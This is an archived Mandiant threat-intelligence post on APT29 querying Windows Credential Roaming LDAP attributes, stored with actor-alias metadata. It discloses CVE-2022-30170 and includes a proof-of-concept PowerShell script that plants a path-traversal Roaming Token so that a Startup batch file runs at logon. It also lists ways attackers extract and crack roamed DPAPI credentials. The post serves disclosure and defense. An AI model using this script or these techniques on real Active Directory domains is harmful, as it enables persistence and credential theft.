{ "id": "4a089da1-cce0-4750-8bd8-d49c249f8dc5", "created_at": "2026-04-06T00:21:58.160879Z", "updated_at": "2026-04-10T13:12:00.871861Z", "deleted_at": null, "sha1_hash": "cdc94f30519e692ca4dd99935e3bbcd23112424c", "title": "They See Me Roaming: Following APT29 by Taking a Deeper Look at Windows Credential Roaming | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2197890, "plain_text": "They See Me Roaming: Following APT29 by Taking a Deeper Look\r\nat Windows Credential Roaming | Mandiant\r\nBy Mandiant\r\nPublished: 2022-11-08 · Archived: 2026-04-05 12:40:18 UTC\r\nWritten by: Thibault Van Geluwe de Berlaere\r\nIn early 2022, Mandiant detected and responded to an incident where APT29 successfully phished a European\r\ndiplomatic entity and ultimately abused the Windows Credential Roaming feature. The diplomatic-centric\r\ntargeting is consistent with Russian strategic priorities as well as historic APT29 targeting. Mandiant has been\r\ntracking APT29—a Russian espionage group that is sponsored by the Foreign Intelligence Service (SVR)—since\r\nat least 2014. Some APT29 activity is also publicly referred to as Nobelium by Microsoft.\r\nDuring the short timespan that APT29 was determined to be active inside the victim network, Mandiant observed\r\nnumerous LDAP queries with atypical properties (Figure 1) performed against the Active Directory system.\r\n4662 | Audit Success | An operation was performed on an object.\r\nSubject :\r\nSecurity ID: \u003c redacted by Mandiant \u003e\r\nAccount Name: \u003c redacted by Mandiant \u003e\r\nAccount Domain:\r\nLogon ID: 0x000000006d15eb96\r\nObject:\r\nObject Server: DS\r\nObject Type: %{bf967aba-0de6-11d0-a285-00aa003049e2}\r\nObject Name: \u003c redacted by Mandiant \u003e\r\nHandle ID: 0x0000000000000000\r\nOperation:\r\nOperation Type: Object Access\r\nAccesses: %%7688\r\nAccess Mask: 0x00000100\r\nProperties: %%7688\r\n{771727b1-31b8-4cdf-ae62-4fe39fadf89e}\r\n{612cb747-c0e8-4f92-9221-fdd5f15b550d}\r\n{91e647de-d96f-4b70-9557-d63ff4f3ccd8}\r\n{b7ff5a38-0818-42b0-8110-d3d154c97f24}\r\n{bf967aba-0de6-11d0-a285-00aa003049e2}\r\nFigure 1: Example of event log of LDAP query\r\nhttps://www.mandiant.com/resources/blog/apt29-windows-credential-roaming\r\nPage 1 of 11\n\nThe queried LDAP attributes relate to usual credential information gathering (e.g. unixUserPassword); however,\r\none attribute in particular stood out: {b7ff5a38-0818-42b0-8110-d3d154c97f24} , or msPKI-CredentialRoamingTokens , which is described by Microsoft as ‘storage of encrypted user credential token BLOBs\r\nfor roaming’. Upon further inspection, Mandiant identified that this attribute is part of a lesser-known feature of\r\nActive Directory: Credential Roaming.\r\nA Deep Dive into Credential Roaming\r\nCredential Roaming was introduced in Windows Server 2003 SP1 and is still supported on Windows 11 and\r\nWindows Server 2022. This feature was created to allow certificates (and other credentials) to ‘roam’ with the\r\nuser.\r\nFor example: Consider a scenario where a corporation uses autoenrollment to automatically provision certificates\r\nfor employees for the purpose of Secure/Multipurpose Internet Mail Extension (S/MIME) encryption. When user\r\nAlice logs on to device A, the autoenrollment process launches and she is enrolled into the corresponding\r\ncertificate template. However, should Alice now log in to device B, she would receive a new certificate (because\r\nthe certificate is device-local). Credential Roaming ensures that Alice’s first S/MIME certificate (from device A),\r\nincluding the private key, is saved to device B before the autoenrollment process kicks in. With Credential\r\nRoaming, Alice would only enroll one certificate, thereby removing the need for duplicate certificates and\r\nreducing the certificate management overhead.\r\nhttps://www.mandiant.com/resources/blog/apt29-windows-credential-roaming\r\nPage 2 of 11\n\nFigure 2: Credential Roaming diagram (source)\r\nAny kind of certificates, including certificates from external sources (such as public PKI vendors), are supported\r\n(with the exclusion of certificates where the private key is stored in hardware [e.g. TPM]). More examples and\r\ndetails are available in a Microsoft whitepaper on Credential Roaming, published in 2012.\r\nWindows Vista extended the credential roaming functionality so that usernames and passwords stored in the\r\nWindows Credential Manager can also be roamed between computers. This functionality was removed in\r\nWindows 7, presumably due to security precautions.\r\nhttps://www.mandiant.com/resources/blog/apt29-windows-credential-roaming\r\nPage 3 of 11\n\nCredential Roaming was touched upon briefly by Michael Grafnetter in his blog post Extracting Roamed Private\r\nKeys from Active Directory, where Mr. Grafnetter explains how his DSInternals toolkit can be used to extract\r\nthe roamed credentials from Active Directory and how the popular Mimikatz tool can be used to decrypt the\r\nDPAPI secrets with the DPAPI Domain Backup Key.\r\nCredential Roaming synchronizes certificates and credentials (called ‘Roaming Tokens’) by using the user’s\r\nActive Directory account as a datastore. The 2012 Microsoft whitepaper identifies the following LDAP properties\r\nare used in Credential Roaming:\r\nmsPKI-CredentialRoamingTokens\r\nmsPKIRoamingTimeStamp\r\nmsPKIDPAPIMasterKeys\r\nmsPKIAccountCredentials\r\nThese attributes form the Private-Information property set. The last attribute, msPKIAccountCredentials , is\r\nwhere the Roaming Tokens are stored. The msPKIRoamingTimeStamp attribute contains the last update time of\r\nmsPKIAccountCredentials , and msPKIDPAPIMasterKeys contains the user’s Data Protection API (DPAPI)\r\nMaster Keys.\r\nCredential Roaming is implemented using a Scheduled Task (Figure 3) at\r\n\\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam . This scheduled task launches a Component\r\nObject Model (COM) object with CLSID {58FB76B9-AC85-4E55-AC04-427593B1D060} , corresponding with the\r\ndimsjob.dll DLL (the Credential Roaming service was formerly named the Digital Identity Management\r\nService [DIMS]). The string “ KEYROAMING ” is passed as an argument.\r\nhttps://www.mandiant.com/resources/blog/apt29-windows-credential-roaming\r\nPage 4 of 11\n\nFigure 3: Scheduled Task that launches Credential Roaming\r\nBy examining the dimsjob.dll DLL entry point, Mandiant observed that dimsjob.dll loads another DLL,\r\ndimsroam.dll , to perform the Credential Roaming functionality (for the purposes of simplicity, the DLLs\r\nexamined in this article are from Windows Server 2008 R2. Recent versions of Windows use various COM objects\r\nto handle Credential Roaming, but the same principles apply).\r\nFigure 4: Snippet of code from dimsjob.dll!CDims::Notify where dimsroam.dll!DimsRoamEntry is called\r\nMandiant then identified the binary structure of the entries in the msPKIAccountCredentials LDAP attribute\r\n(Figure 5).\r\nFigure 5: Binary structure of Roaming Tokens\r\nThe binary structure starts off with an indication of which type of Roaming Token this entry represents. Mandiant\r\nidentified the following types:\r\n%0: DPAPI Master Key\r\n%1: CAPI Private Key (RSA)\r\n%2: CAPI Private Key (DSA)\r\n%3: CAPI Certificate\r\nhttps://www.mandiant.com/resources/blog/apt29-windows-credential-roaming\r\nPage 5 of 11\n\n%4: CAPI Certificate Request\r\n%5: Username/Password (Enterprise Credential Data)\r\n%6: (unknown – presumably unused)\r\n%7: CNG Certificate\r\n%8: CNG Certificate Request\r\n%9: CNG Private Key\r\nNext follows the identifier of the Roaming Token. This is the filename of the corresponding file on disk. The\r\nstructure continues with the last update timestamp of the Roaming Token, some NULL bytes (padding) and the\r\nSHA1 hash of the Roaming Token data. Finally, the size of the Roaming Token data is included (4 bytes integer)\r\nand the raw data of the Roaming Token data.\r\nWhen dimsroam.dll launches, it retrieves these structures from the msPKIAccountCredentials LDAP attribute\r\nof the current user. For every entry, it determines if there already exists a local file that corresponds to the\r\nRoaming Token. If such a file is found, dimsroam.dll will compare the last file write time and the SHA1 hash\r\nand update the file if necessary. If such a local file is not found, dimsroam.dll identifies the correct save location\r\nfor the binary data based on the type of the Roaming Token (Figure 6).\r\nFigure 6: Snippet from dimsroam.dll where the save location is determined based on the Roaming Token type (the\r\npath is prepended with the user’s\r\nTo determine the final save location of the roaming token, the identifier (byte 0x03 to 0x0F) is appended to the\r\nfolder path string (Figure 7).\r\nhttps://www.mandiant.com/resources/blog/apt29-windows-credential-roaming\r\nPage 6 of 11\n\nFigure 7: Identifier string is appended to folder path string\r\nThis file path is then directly passed to a kernel32!CreateFileW API call (Figure 8), where the Roaming Token\r\ndata will be written.\r\nFigure 8: The modified file path is passed to kernel32!CreateFileW\r\nCVE-2022-30170: Arbitrary File Write turns Remote Code Execution\r\nThe aforementioned behavior introduces an Arbitrary File Write vulnerability: the file path is not properly\r\nsanitized and may contain directory traversal (“..\\”) characters. If an attacker can control the\r\nmsPKIAccountCredentials LDAP attribute, they may add a malicious Roaming Token entry where the identifier\r\nstring contains directory traversal characters and thereby write an arbitrary number of bytes to any file on the file\r\nhttps://www.mandiant.com/resources/blog/apt29-windows-credential-roaming\r\nPage 7 of 11\n\nsystem, posing as the victim account. The only constraint is that the full file name plus directory traversal\r\ncharacters fits within the 92 bytes buffer.\r\nAs a proof of concept, Mandiant developed the following malicious Roaming Token entry (Figure 9).\r\nFigure 9: Malicious Roaming Token entry\r\nTo insert the malicious Roaming Token entry into the msPKIAccountCredentials LDAP attribute of a victim\r\naccount, run the following PowerShell script (Figure 10).\r\n# Fetch current user object\r\n$user = get-aduser -properties @('msPKIDPAPIMasterKeys',\r\n'msPKIAccountCredentials', 'msPKI-CredentialRoamingTokens',\r\n'msPKIRoamingTimestamp')\r\n# Install malicious Roaming Token (spawns calc.exe)\r\n$malicious_hex = \"25335c2e2e5c2e2e5c57696e646f77735c5374617274204d656e755c50726f6772616d735c5374\r\n61727475705c6d616c6963696f75732e6261740000000000000000000000000000000\r\n000000000000000000000000000000000000000000000f0a1f04c9c1ad80100000000f52f696ec0f1d3b13e9d\r\n9d553adbb491ca6cc7a319000000406563686f206f66660d0a73746172742063616c632e657865\"\r\n$attribute_string = \"B:$($malicious_hex.Length):${malicious_hex}:$($user.DistinguishedName)\"\r\nSet-ADUser -Identity $user -Add @{msPKIAccountCredentials=$attribute_string} -Verbose\r\n# Set new msPKIRoamingTimestamp so the victim machine knows an update was pushed\r\n$new_msPKIRoamingTimestamp = ($user.msPKIRoamingTimestamp[8..15] + [System.BitConverter]::GetBytes([datetime]::U\r\nset-aduser -Identity $user -Replace @{msPKIRoamingTimestamp=$new_msPKIRoamingTimestamp} -Verbose\r\nFigure 10: PowerShell script to insert the malicious Roaming Token entry\r\nBy updating the msPKIRoamingTimeStamp attribute, the Credential Roaming service will trigger synchronization\r\non any computer where the victim user logs in from then on; dimsroam.dll will parse the\r\nmsPKIAccountCredentials LDAP attribute and will create\r\n‘ %APPDATA%\\Microsoft\\SystemCertificates\\My\\Certificates\\..\\..\\..\\Windows\\Start\r\nMenu\\Programs\\Startup\\malicious.bat ‘ (or simplified, ‘ %APPDATA%\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\malicious.bat ‘) with the content ‘ @echo off [newline] start calc.exe’ . This BAT\r\nfile will execute the next time the user logs on to any system, thereby achieving remote code execution in the\r\ncontext of the victim user.\r\nhttps://www.mandiant.com/resources/blog/apt29-windows-credential-roaming\r\nPage 8 of 11\n\nThis vulnerability was reported to MSRC in April 2022 and was classified as an ‘Elevation of Privilege’\r\nvulnerability. Microsoft assigned CVE-2022-30170 and published KB5017365 and KB5017367 on September 13\r\n2022 to address the issue. Mandiant published this vulnerability under MNDT-2022-0038.\r\nAn Attacker's Perspective\r\nThe use of Credential Roaming in an organization allows attackers (and Red Teams) to abuse the saved credentials\r\nfor the purposes of privilege escalation. The author identifies the following situations that could allow an attacker\r\nto abuse Credential Roaming:\r\n1. An organization has not applied the September 2022 patch to each system where Credential Roaming is\r\nused.\r\nThe affected systems are vulnerable to CVE-2022-30170 – an attacker can abuse this vulnerability to write\r\narbitrary files to the affected systems in the context of any users they can control, possibly allowing for\r\nlateral movement. Using this technique, an attacker can spread to any affected system accessed by the\r\nvictim user, including systems that are possibly unknown to the attacker at the time of compromise, in a\r\nfully automatic fashion.\r\nNote that the attacker requires write access to the victim user’s Active Directory account, either by having\r\naccess to the account itself or through another AD account with sufficient privileges over the victim\r\naccount. Credential Roaming must be configured and in use on the victim user and system for the\r\nvulnerability to be exploitable.\r\n2. An attacker gained Domain Administrator privileges in an organization where Credential Roaming is in use\r\nor was used in the past without proper clean-up.\r\nIn this scenario, the attacker can retrieve the DPAPI Domain Backup Key and decrypt all credentials stored\r\nin the Active Directory attributes for Credential Roaming. In his blog post ‘Extracting Roamed Private\r\nKeys from Active Directory’, Mr. Grafnetter explains how his DSInternals toolkit can be used to extract\r\nthe roamed credentials from Active Directory and how Mimikatz tool can be used to decrypt the DPAPI\r\nsecrets with the DPAPI Domain Backup Key.\r\nNote that even if your organization does not currently use Credential Roaming, but used Credential\r\nRoaming in the past, credentials may still be stored in the Active Directory! In their 2012 whitepaper,\r\nMicrosoft explains how system administrators should decommission Certificate Roaming. The\r\ndecommissioning process includes manual deletion of the Roaming Credentials from Active Directory\r\n(clearing the msPKIAccountCredentials , msPKIRoamingTimeStamp and msPKIDPAPIMasterKeys LDAP\r\nattributes). Organizations that failed to perform this clean-up process may still have sensitive secrets stored\r\nin their Active Directory environment.\r\nAdditionally, if the organization uses (or used) Credential Roaming with Windows Vista-era machines, not\r\nonly certificates/private keys but also usernames and passwords may be stored in the Active Directory\r\n(Windows 7 removed the ability to roam usernames and passwords, presumably due to security concerns).\r\nhttps://www.mandiant.com/resources/blog/apt29-windows-credential-roaming\r\nPage 9 of 11\n\n3. An attacker has access to the cleartext password of a user where Credential Roaming is in use or was in use\r\nin the past.\r\nAs in scenario (2), the attacker can authenticate as the victim user and retrieve the Credential Roaming\r\nattributes from Active Directory. With the user’s cleartext password, the attacker can decrypt the DPAPI\r\nmaster key and in turn obtain the credentials stored in the Credential Roaming attributes.\r\n4. An attacker has read access to the msPKIDPAPIMasterKeys attribute on a victim account, but does not have\r\nthe cleartext password of the victim user.\r\nBy reading the msPKIDPAPIMasterKeys attribute, an attacker can extract the DPAPI Master Key for a user\r\nand use the DPAPImk2john.py Python script from the popular John the Ripper password cracking software\r\nto extract the user’s password hash. This hash can then be cracked offline using either John The Ripper\r\n(john) or hashcat.\r\nRecommendations\r\nMandiant recommends organizations to check whether Credential Roaming is in use in their environment; and if\r\nso, apply the September 2022 patch urgently to remediate CVE-2022-30170. Additionally, organizations that have\r\nused Credential Roaming in the past should investigate if the proper clean-up process (as described by Microsoft)\r\nwas followed.\r\nFuture Work\r\nWhile this research certainly deepens our understanding of Credential Roaming and offers insight into why\r\nAPT29 is actively querying the related LDAP attributes in Active Directory, the attribute that Mandiant IR\r\nconsultants observed ( msPKI-CredentialRoamingTokens {b7ff5a38-0818-42b0-8110-d3d154c97f24} ) is not\r\nfeatured in the inner workings of Credential Roaming. Mandiant was—as of yet—unable to determine how (or if)\r\nthis attribute is used in Credential Roaming.\r\nReferences\r\n1. Certs On Wheels: Understanding Credential Roaming – Microsoft\r\n2. Extracting Roamed Private Keys from Active Directory – Michael Grafnetter\r\n3. Windows: Credential Roaming (Whitepaper) – Microsoft\r\n4. CVE-2022-30170: Windows Credential Roaming Service Elevation of Privilege Vulnerability – Microsoft\r\n5. MNDT-2022-0038: Windows Credential Roaming Service Elevation of Privilege Vulnerability\r\nAppendix: Disclosure Timeline for CVE-2022-30170\r\n20 April 2022 - Issue submitted to Microsoft\r\n26 April 2022 - Case opened\r\n18 May 2022 - Microsoft confirms issue\r\n01 June 2022 - Microsoft classifies issue as a 'Defense in Depth' vulnerability\r\n07 June 2022 - Re-explain scope and impact to MSRC\r\nhttps://www.mandiant.com/resources/blog/apt29-windows-credential-roaming\r\nPage 10 of 11\n\n09 June 2022 - MSRC re-evaluates severity of the issue\r\n17 June 2022 - MSRC assigns CVE-2022-30170\r\n13 September 2022 - Patch released\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming\r\nhttps://www.mandiant.com/resources/blog/apt29-windows-credential-roaming\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "ETDA" ], "origins": [ "web" ], "references": [ "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming" ], "report_names": [ "apt29-windows-credential-roaming" ], "threat_actors": [ { "id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba", "created_at": "2022-10-25T16:07:24.36191Z", "updated_at": "2026-04-10T02:00:04.954902Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "Dark Halo", "Nobelium", "SolarStorm", "StellarParticle", "UNC2452" ], "source_name": "ETDA:UNC2452", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89", "created_at": "2022-10-25T15:50:23.739197Z", "updated_at": "2026-04-10T02:00:05.275809Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "UNC2452", "NOBELIUM", "StellarParticle", "Dark Halo" ], "source_name": "MITRE:UNC2452", "tools": [ "Sibot", "Mimikatz", "Cobalt Strike", "AdFind", "GoldMax" ], "source_id": "MITRE", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "70872c3a-e788-4b55-a7d6-b2df52001ad0", "created_at": "2023-01-06T13:46:39.18401Z", "updated_at": "2026-04-10T02:00:03.239111Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "DarkHalo", "StellarParticle", "NOBELIUM", "Solar Phoenix", "Midnight Blizzard" ], "source_name": "MISPGALAXY:UNC2452", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434918, "ts_updated_at": 1775826720, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/cdc94f30519e692ca4dd99935e3bbcd23112424c.pdf", "text": "https://archive.orkl.eu/cdc94f30519e692ca4dd99935e3bbcd23112424c.txt", "img": "https://archive.orkl.eu/cdc94f30519e692ca4dd99935e3bbcd23112424c.jpg" } }